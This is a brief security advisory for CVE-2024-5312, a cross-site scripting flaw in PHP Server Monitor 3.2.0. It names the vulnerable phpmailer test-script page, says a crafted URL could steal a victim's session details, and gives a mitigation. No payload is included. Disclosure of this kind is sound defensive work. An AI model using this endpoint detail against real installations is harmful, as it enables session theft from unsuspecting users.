CVE-2024-5312

Name of the Vulnerable Software and Affected Versions PHP Server Monitor version 3.2.0

Description The issue allows for an XSS attack via the "/phpservermon-3.2.0/vendor/phpmailer/phpmailer/test script/index.php" page, where all visible parameters are vulnerable. An attacker can create a specially crafted URL and send it to a victim to potentially retrieve their session details.

Recommendations For PHP Server Monitor version 3.2.0, consider restricting access to the "/phpservermon-3.2.0/vendor/phpmailer/phpmailer/test script/index.php" page until a fix is available, and avoid using vulnerable parameters in this endpoint to minimize the risk of exploitation.